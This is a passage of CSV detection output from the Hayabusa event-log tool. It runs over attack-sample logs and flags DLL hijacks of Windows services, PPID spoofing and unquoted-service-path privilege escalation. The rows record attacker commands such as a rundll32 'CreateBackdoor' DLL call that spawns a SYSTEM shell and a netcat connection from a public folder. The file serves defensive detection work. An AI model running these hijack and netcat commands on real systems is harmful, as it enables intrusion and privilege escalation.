wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll 
Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 
7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll 
Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 
+09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 
+2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent 
Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p 